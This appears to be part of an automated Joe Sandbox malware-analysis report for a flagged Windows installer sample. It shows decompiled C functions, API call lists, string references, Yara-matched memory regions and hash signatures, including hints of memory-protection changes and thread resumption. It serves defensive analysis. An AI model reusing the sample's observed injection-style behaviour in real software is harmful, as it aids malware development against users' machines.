                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ADA
                                                                          • FindClose.KERNEL32(00000000), ref: 00405AE9
                                                                          Strings
                                                                          • \*.*, xrefs: 004059FB
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040599E
                                                                          • "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe", xrefs: 00405990
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                          • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                          • API String ID: 2035342205-1714237646
                                                                          • Opcode ID: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
                                                                          • Instruction ID: f2c7612d72ec45a398f238805cdec5f3e53338685f49ce317d80e039c8d46841
                                                                          • Opcode Fuzzy Hash: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
                                                                          • Instruction Fuzzy Hash: 4E41C230A01A14AACB21AB658C89AAF7778DF81764F14427FF801711C1D77CA992DE6E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E004065C5(WCHAR* _a4) {
                                                                          				void* _t2;
                                                                          
                                                                          				_t2 = FindFirstFileW(_a4, 0x430298); // executed
                                                                          				if(_t2 == 0xffffffff) {
                                                                          					return 0;
                                                                          				}
                                                                          				FindClose(_t2); // executed
                                                                          				return 0x430298;
                                                                          			}





                                                                          APIs
                                                                          • FindFirstFileW.KERNELBASE(?,00430298,C:\,00405CA4,C:\,C:\,00000000,C:\,C:\,?,?,75523420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75523420), ref: 004065D0
                                                                          • FindClose.KERNELBASE(00000000), ref: 004065DC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileFirst
                                                                          • String ID: C:\
                                                                          • API String ID: 2295610775-3404278061
                                                                          • Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                                          • Instruction ID: c6d438537f48b5b2fd9a798109b403d1ef13146c040350fe47557a90c5bdf24f
                                                                          • Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                                          • Instruction Fuzzy Hash: E6D012315091206BC6551B387E0C84B7A589F153717258B37B86AF11E4C734CC628698
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 67%
                                                                          			E004020FE() {
                                                                          				signed int _t52;
                                                                          				void* _t56;
                                                                          				intOrPtr* _t60;
                                                                          				intOrPtr _t61;
                                                                          				intOrPtr* _t62;
                                                                          				intOrPtr* _t64;
                                                                          				intOrPtr* _t66;
                                                                          				intOrPtr* _t68;
                                                                          				intOrPtr* _t70;
                                                                          				intOrPtr* _t72;
                                                                          				intOrPtr* _t74;
                                                                          				intOrPtr* _t76;
                                                                          				intOrPtr* _t78;
                                                                          				intOrPtr* _t80;
                                                                          				void* _t83;
                                                                          				intOrPtr* _t91;
                                                                          				signed int _t101;
                                                                          				signed int _t105;
                                                                          				void* _t107;
                                                                          
                                                                          				 *((intOrPtr*)(_t107 - 0x4c)) = E00402C37(0xfffffff0);
                                                                          				 *((intOrPtr*)(_t107 - 0x3c)) = E00402C37(0xffffffdf);
                                                                          				 *((intOrPtr*)(_t107 - 8)) = E00402C37(2);
                                                                          				 *((intOrPtr*)(_t107 - 0x48)) = E00402C37(0xffffffcd);
                                                                          				 *((intOrPtr*)(_t107 - 0xc)) = E00402C37(0x45);
                                                                          				_t52 =  *(_t107 - 0x18);
                                                                          				 *(_t107 - 0x44) = _t52 & 0x00000fff;
                                                                          				_t101 = _t52 & 0x00008000;
                                                                          				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                                          				 *(_t107 - 0x38) = _t52 >> 0x00000010 & 0x0000ffff;
                                                                          				if(E00405BCA( *((intOrPtr*)(_t107 - 0x3c))) == 0) {
                                                                          					E00402C37(0x21);
                                                                          				}
                                                                          				_t56 = _t107 + 8;
                                                                          				__imp__CoCreateInstance(0x4085e8, _t83, 1, 0x4085d8, _t56); // executed
                                                                          				if(_t56 < _t83) {
                                                                          					L14:
                                                                          					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                                          					_push(0xfffffff0);
                                                                          				} else {
                                                                          					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                                          					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4085f8, _t107 - 0x30);
                                                                          					 *((intOrPtr*)(_t107 - 0x10)) = _t61;
                                                                          					if(_t61 >= _t83) {
                                                                          						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                                          						 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x3c)));
                                                                          						if(_t101 == _t83) {
                                                                          							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                                          							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ligtorn\\Pantry\\Agrafferne");
                                                                          						}
                                                                          						if(_t105 != _t83) {
                                                                          							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                                          							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                                          						}
                                                                          						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                                          						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x38));
                                                                          						_t91 =  *((intOrPtr*)(_t107 - 0x48));
                                                                          						if( *_t91 != _t83) {
                                                                          							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                                          							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x44));
                                                                          						}
                                                                          						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                                          						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                                          						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                                          						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                                          						if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
                                                                          							_t74 =  *((intOrPtr*)(_t107 - 0x30));
                                                                          							 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x4c)), 1);
                                                                          						}
                                                                          						_t72 =  *((intOrPtr*)(_t107 - 0x30));
                                                                          						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                          					}
                                                                          					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                                          					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                          					if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
                                                                          						_push(0xfffffff4);
                                                                          					} else {
                                                                          						goto L14;
                                                                          					}
                                                                          				}
                                                                          				E00401423();
                                                                          				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
                                                                          				return 0;
                                                                          			}























                                                                          APIs
                                                                          • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Agrafferne, xrefs: 004021BD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInstance
                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Agrafferne
                                                                          • API String ID: 542301482-282784380
                                                                          • Opcode ID: 0ef6bbf442897ef527506715e7f738d692543a3abdbaa0dc7b7a5ab61d8902ee
                                                                          • Instruction ID: 2ba5a37aa1c239f751097cd18d9f1051e5d6a8806e2346af1523e8cbd5355f1b
                                                                          • Opcode Fuzzy Hash: 0ef6bbf442897ef527506715e7f738d692543a3abdbaa0dc7b7a5ab61d8902ee
                                                                          • Instruction Fuzzy Hash: 504139B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: I(l$c~M]
                                                                          • API String ID: 0-1567962784
                                                                          • Opcode ID: a43f7bcde103fb0e63b88409cb3d5e4fde7659e9fb405aff49782e22973e56df
                                                                          • Instruction ID: 0eaf31ac208039d0c7d2100604a49c21e5a6d512574535e614dedea3a499ebe4
                                                                          • Opcode Fuzzy Hash: a43f7bcde103fb0e63b88409cb3d5e4fde7659e9fb405aff49782e22973e56df
                                                                          • Instruction Fuzzy Hash: 2A0238756003458FDF349E68C9E83EE37A2EF563A0F94817ECC8A8B655D3344986CB41
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 2,:
                                                                          • API String ID: 0-1503982528
                                                                          • Opcode ID: f50061817eae5e82c333cd147ec149c023c1fd5110c03fc24afc4c882f6059f6
                                                                          • Instruction ID: 0d19b99fefdfa599c78d5a978a23d0966fffa1305260c394c0fc6b6026818fad
                                                                          • Opcode Fuzzy Hash: f50061817eae5e82c333cd147ec149c023c1fd5110c03fc24afc4c882f6059f6
                                                                          • Instruction Fuzzy Hash: 80B129B160034A9FDF34AE689DB47EB3793AF567A0F95412EDC8E9B640D3314986CB01
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateFileA.KERNELBASE(?,8F5BB8AA,-8EE2104D,-01FAE51F,8E641DED,7F8A0721,06DB9A82,02B7FE82,-523F4620,00000000), ref: 02B8019A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 720e27867db72e0b62c8e54143d858fbb978d8682966d48f3ed024a4c50aa92f
                                                                          • Instruction ID: dfdb2371c21d80d789676bc74ed9b8efd897f73777c66121800a13f2ab68e512
                                                                          • Opcode Fuzzy Hash: 720e27867db72e0b62c8e54143d858fbb978d8682966d48f3ed024a4c50aa92f
                                                                          • Instruction Fuzzy Hash: 8121577164434A8FDB74AE7889A17EBB7B7AF81390F82452DCCCA87144D3719485CB02
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtResumeThread.NTDLL(00000001,02B8544C,D5DE3B79,00000000), ref: 02B84CCC
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 8026799ff50e9a01677a9f9b5bd0076fedf30ef839978f94eb4646863113a253
                                                                          • Instruction ID: ac1eb273573ab15f6783c1600eb1dae59eacfccdfb6cb6c18529dc36f2f07788
                                                                          • Opcode Fuzzy Hash: 8026799ff50e9a01677a9f9b5bd0076fedf30ef839978f94eb4646863113a253
                                                                          • Instruction Fuzzy Hash: FB016231604247CFCB28EE748A947EA77B5AF88344F1146A5CE4FCB614D7749941CF20
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtProtectVirtualMemory.NTDLL(-D34ECDF4,?,?,?,02B82E31,-2C6722CC), ref: 02B83ABB
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MemoryProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 2706961497-0
                                                                          • Opcode ID: 6f94b9e1ed2ff981347080adc9b0516cbaaecd4f72faff05709ec7ab48df93f6
                                                                          • Instruction ID: b955de39a438554adb8df6e08f6f3c153611a7cccbb2df2d9d5645cbdda30fb4
                                                                          • Opcode Fuzzy Hash: 6f94b9e1ed2ff981347080adc9b0516cbaaecd4f72faff05709ec7ab48df93f6
                                                                          • Instruction Fuzzy Hash: B501B175A04295DBCF38CE148948BFA36A5AFD8714F46816AEC1D3B308D6309E01C794
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c89d4967f5d7b31e3198f13acd41cdcfa0907fe60045fbc11e2048e3baf40376
                                                                          • Instruction ID: 6f4581c73a62e1750108290ef3e7954fc947636da8925787dcbcc4d94e58fc86
                                                                          • Opcode Fuzzy Hash: c89d4967f5d7b31e3198f13acd41cdcfa0907fe60045fbc11e2048e3baf40376
                                                                          • Instruction Fuzzy Hash: AFF19B72A003459FDF349E6489A47EF77A3EF95790F96842EDC8D9B604D3308986CB42
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0c68953597880da94e1a8115976f2593535f7faab56b2d2395f0023abb124685
                                                                          • Instruction ID: 5f364868699e44f91f6f40296180451c70172a61a9610d914455117ccd593c43
                                                                          • Opcode Fuzzy Hash: 0c68953597880da94e1a8115976f2593535f7faab56b2d2395f0023abb124685
                                                                          • Instruction Fuzzy Hash: 2ED12675A003599FDF34AE788CA87EF37A2AF967A0F95452DDC8E97644D3304981CB02
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a962e84d7e709597c39d1d3dc58c519308a3a8c34897aec37b73cfd48a6dbf93
                                                                          • Instruction ID: bea204f22444d2766aafa8f22c1c9589a2f9b8447ce0076e9971bd3cfc9c7b71
                                                                          • Opcode Fuzzy Hash: a962e84d7e709597c39d1d3dc58c519308a3a8c34897aec37b73cfd48a6dbf93
                                                                          • Instruction Fuzzy Hash: 1FB14671A0434A9FDF34AE788DA43EF37A2AF56760F95427ECC8D9B645C33149858B02
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 80df45ee59084c07a0442dd54419df5689e8ac4211a0492da0f4e9c082a2d701
                                                                          • Instruction ID: 124e96576b218b162d80016c1688d88a55305113219185a7162dbb742c5dcca0
                                                                          • Opcode Fuzzy Hash: 80df45ee59084c07a0442dd54419df5689e8ac4211a0492da0f4e9c082a2d701
                                                                          • Instruction Fuzzy Hash: D25125B16003059FEF346E688DA47EF3693AF567A0F95413ACC8D97644D37089868B02
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 83%
                                                                          			E00403D3E(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                          				struct HWND__* _v32;
                                                                          				void* _v84;
                                                                          				void* _v88;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				signed int _t37;
                                                                          				signed int _t39;
                                                                          				signed int _t41;
                                                                          				struct HWND__* _t51;
                                                                          				signed int _t70;
                                                                          				struct HWND__* _t76;
                                                                          				signed int _t89;
                                                                          				struct HWND__* _t94;
                                                                          				signed int _t102;
                                                                          				int _t106;
                                                                          				signed int _t118;
                                                                          				signed int _t119;
                                                                          				int _t120;
                                                                          				signed int _t125;
                                                                          				struct HWND__* _t128;
                                                                          				struct HWND__* _t129;
                                                                          				int _t130;
                                                                          				long _t133;
                                                                          				int _t135;
                                                                          				int _t136;
                                                                          				void* _t137;
                                                                          				void* _t144;
                                                                          
                                                                          				_t118 = _a8;
                                                                          				if(_t118 == 0x110 || _t118 == 0x408) {
                                                                          					_t37 = _a12;
                                                                          					_t128 = _a4;
                                                                          					__eflags = _t118 - 0x110;
                                                                          					 *0x42d230 = _t37;
                                                                          					if(_t118 == 0x110) {
                                                                          						 *0x434ee8 = _t128;
                                                                          						 *0x42d244 = GetDlgItem(_t128, 1);
                                                                          						_t94 = GetDlgItem(_t128, 2);
                                                                          						_push(0xffffffff);
                                                                          						_push(0x1c);
                                                                          						 *0x42b210 = _t94;
                                                                          						E00404217(_t128);
                                                                          						SetClassLongW(_t128, 0xfffffff2,  *0x433ec8);
                                                                          						 *0x433eac = E0040140B(4);
                                                                          						_t37 = 1;
                                                                          						__eflags = 1;
                                                                          						 *0x42d230 = 1;
                                                                          					}
                                                                          					_t125 =  *0x40a368; // 0x0
                                                                          					_t136 = 0;
                                                                          					_t133 = (_t125 << 6) +  *0x434f20;
                                                                          					__eflags = _t125;
                                                                          					if(_t125 < 0) {
                                                                          						L34:
                                                                          						E00404263(0x40b);
                                                                          						while(1) {
                                                                          							_t39 =  *0x42d230;
                                                                          							 *0x40a368 =  *0x40a368 + _t39;
                                                                          							_t133 = _t133 + (_t39 << 6);
                                                                          							_t41 =  *0x40a368; // 0x0
                                                                          							__eflags = _t41 -  *0x434f24;
                                                                          							if(_t41 ==  *0x434f24) {
                                                                          								E0040140B(1);
                                                                          							}
                                                                          							__eflags =  *0x433eac - _t136;
                                                                          							if( *0x433eac != _t136) {
                                                                          								break;
                                                                          							}
                                                                          							__eflags =  *0x40a368 -  *0x434f24; // 0x0
                                                                          							if(__eflags >= 0) {
                                                                          								break;
                                                                          							}
                                                                          							_t119 =  *(_t133 + 0x14);
                                                                          							E004062A4(_t119, _t128, _t133, 0x444000,  *((intOrPtr*)(_t133 + 0x24)));
                                                                          							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                                          							_push(0xfffffc19);
                                                                          							E00404217(_t128);
                                                                          							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                                          							_push(0xfffffc1b);
                                                                          							E00404217(_t128);
                                                                          							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                                          							_push(0xfffffc1a);
                                                                          							E00404217(_t128);
                                                                          							_t51 = GetDlgItem(_t128, 3);
                                                                          							__eflags =  *0x434f8c - _t136;
                                                                          							_v32 = _t51;
                                                                          							if( *0x434f8c != _t136) {
                                                                          								_t119 = _t119 & 0x0000fefd | 0x00000004;
                                                                          								__eflags = _t119;
                                                                          							}
                                                                          							ShowWindow(_t51, _t119 & 0x00000008); // executed
                                                                          							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100); // executed
                                                                          							E00404239(_t119 & 0x00000002);
                                                                          							_t120 = _t119 & 0x00000004;
                                                                          							EnableWindow( *0x42b210, _t120);
                                                                          							__eflags = _t120 - _t136;
                                                                          							if(_t120 == _t136) {
                                                                          								_push(1);
                                                                          							} else {
                                                                          								_push(_t136);
                                                                          							}
                                                                          							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
                                                                          							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, 1);
                                                                          							__eflags =  *0x434f8c - _t136;
                                                                          							if( *0x434f8c == _t136) {
                                                                          								_push( *0x42d244);
                                                                          							} else {
                                                                          								SendMessageW(_t128, 0x401, 2, _t136);
                                                                          								_push( *0x42b210);
                                                                          							}
                                                                          							E0040424C();
                                                                          							E00406282(0x42d248, E00403D1F());
                                                                          							E004062A4(0x42d248, _t128, _t133,  &(0x42d248[lstrlenW(0x42d248)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                                          							SetWindowTextW(_t128, 0x42d248); // executed
                                                                          							_push(_t136);
                                                                          							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                                          							__eflags = _t70;
                                                                          							if(_t70 != 0) {
                                                                          								continue;
                                                                          							} else {
                                                                          								__eflags =  *_t133 - _t136;
                                                                          								if( *_t133 == _t136) {
                                                                          									continue;
                                                                          								}
                                                                          								__eflags =  *(_t133 + 4) - 5;
                                                                          								if( *(_t133 + 4) != 5) {
                                                                          									DestroyWindow( *0x433eb8); // executed
                                                                          									 *0x42c220 = _t133;
                                                                          									__eflags =  *_t133 - _t136;
                                                                          									if( *_t133 <= _t136) {
                                                                          										goto L58;
                                                                          									}
                                                                          									_t76 = CreateDialogParamW( *0x434ee0,  *_t133 +  *0x433ec0 & 0x0000ffff, _t128,  *(0x40a36c +  *(_t133 + 4) * 4), _t133); // executed
                                                                          									__eflags = _t76 - _t136;
                                                                          									 *0x433eb8 = _t76;
                                                                          									if(_t76 == _t136) {
                                                                          										goto L58;
                                                                          									}
                                                                          									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                                          									_push(6);
                                                                          									E00404217(_t76);
                                                                          									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
                                                                          									ScreenToClient(_t128, _t137 + 0x10);
                                                                          									SetWindowPos( *0x433eb8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                                          									_push(_t136);
                                                                          									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                                          									__eflags =  *0x433eac - _t136;
                                                                          									if( *0x433eac != _t136) {
                                                                          										goto L61;
                                                                          									}
                                                                          									ShowWindow( *0x433eb8, 8); // executed
                                                                          									E00404263(0x405);
                                                                          									goto L58;
                                                                          								}
                                                                          								__eflags =  *0x434f8c - _t136;
                                                                          								if( *0x434f8c != _t136) {
                                                                          									goto L61;
                                                                          								}
                                                                          								__eflags =  *0x434f80 - _t136;
                                                                          								if( *0x434f80 != _t136) {
                                                                          									continue;
                                                                          								}
                                                                          								goto L61;
                                                                          							}
                                                                          						}
                                                                          						DestroyWindow( *0x433eb8);
                                                                          						 *0x434ee8 = _t136;
                                                                          						EndDialog(_t128,  *0x42ba18);
                                                                          						goto L58;
                                                                          					} else {
                                                                          						__eflags = _t37 - 1;
                                                                          						if(_t37 != 1) {
                                                                          							L33:
                                                                          							__eflags =  *_t133 - _t136;
                                                                          							if( *_t133 == _t136) {
                                                                          								goto L61;
                                                                          							}
                                                                          							goto L34;
                                                                          						}
                                                                          						_push(0);
                                                                          						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                                          						__eflags = _t89;
                                                                          						if(_t89 == 0) {
                                                                          							goto L33;
                                                                          						}
                                                                          						SendMessageW( *0x433eb8, 0x40f, 0, 1);
                                                                          						__eflags =  *0x433eac;
                                                                          						return 0 |  *0x433eac == 0x00000000;
                                                                          					}
                                                                          				} else {
                                                                          					_t128 = _a4;
                                                                          					_t136 = 0;
                                                                          					if(_t118 == 0x47) {
                                                                          						SetWindowPos( *0x42d228, _t128, 0, 0, 0, 0, 0x13);
                                                                          					}
                                                                          					if(_t118 == 5) {
                                                                          						asm("sbb eax, eax");
                                                                          						ShowWindow( *0x42d228,  ~(_a12 - 1) & _t118);
                                                                          					}
                                                                          					if(_t118 != 0x40d) {
                                                                          						__eflags = _t118 - 0x11;
                                                                          						if(_t118 != 0x11) {
                                                                          							__eflags = _t118 - 0x111;
                                                                          							if(_t118 != 0x111) {
                                                                          								L26:
                                                                          								return E0040427E(_t118, _a12, _a16);
                                                                          							}
                                                                          							_t135 = _a12 & 0x0000ffff;
                                                                          							_t129 = GetDlgItem(_t128, _t135);
                                                                          							__eflags = _t129 - _t136;
                                                                          							if(_t129 == _t136) {
                                                                          								L13:
                                                                          								__eflags = _t135 - 1;
                                                                          								if(_t135 != 1) {
                                                                          									__eflags = _t135 - 3;
                                                                          									if(_t135 != 3) {
                                                                          										_t130 = 2;
                                                                          										__eflags = _t135 - _t130;
                                                                          										if(_t135 != _t130) {
                                                                          											L25:
                                                                          											SendMessageW( *0x433eb8, 0x111, _a12, _a16);
                                                                          											goto L26;
                                                                          										}
                                                                          										__eflags =  *0x434f8c - _t136;
                                                                          										if( *0x434f8c == _t136) {
                                                                          											_t102 = E0040140B(3);
                                                                          											__eflags = _t102;
                                                                          											if(_t102 != 0) {
                                                                          												goto L26;
                                                                          											}
                                                                          											 *0x42ba18 = 1;
                                                                          											L21:
                                                                          											_push(0x78);
                                                                          											L22:
                                                                          											E004041F0();
                                                                          											goto L26;
                                                                          										}
                                                                          										E0040140B(_t130);
                                                                          										 *0x42ba18 = _t130;
                                                                          										goto L21;
                                                                          									}
                                                                          									__eflags =  *0x40a368 - _t136; // 0x0
                                                                          									if(__eflags <= 0) {
                                                                          										goto L25;
                                                                          									}
                                                                          									_push(0xffffffff);
                                                                          									goto L22;
                                                                          								}
                                                                          								_push(_t135);
                                                                          								goto L22;
                                                                          							}
                                                                          							SendMessageW(_t129, 0xf3, _t136, _t136);
                                                                          							_t106 = IsWindowEnabled(_t129);
                                                                          							__eflags = _t106;
                                                                          							if(_t106 == 0) {
                                                                          								goto L61;
                                                                          							}
                                                                          							goto L13;
                                                                          						}
                                                                          						SetWindowLongW(_t128, _t136, _t136);
                                                                          						return 1;
                                                                          					} else {
                                                                          						DestroyWindow( *0x433eb8);
                                                                          						 *0x433eb8 = _a12;
                                                                          						L58:
                                                                          						_t144 =  *0x42f248 - _t136; // 0x1
                                                                          						if(_t144 == 0 &&  *0x433eb8 != _t136) {
                                                                          							ShowWindow(_t128, 0xa); // executed
                                                                          							 *0x42f248 = 1;
                                                                          						}
                                                                          						L61:
                                                                          						return 0;
                                                                          					}
                                                                          				}
                                                                          			}
































                                                                          APIs
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D7A
                                                                          • ShowWindow.USER32(?), ref: 00403D97
                                                                          • DestroyWindow.USER32 ref: 00403DAB
                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DC7
                                                                          • GetDlgItem.USER32(?,?), ref: 00403DE8
                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DFC
                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403E03
                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403EB1
                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403EBB
                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403ED5
                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F26
                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403FCC
                                                                          • ShowWindow.USER32(00000000,?), ref: 00403FED
                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FFF
                                                                          • EnableWindow.USER32(?,?), ref: 0040401A
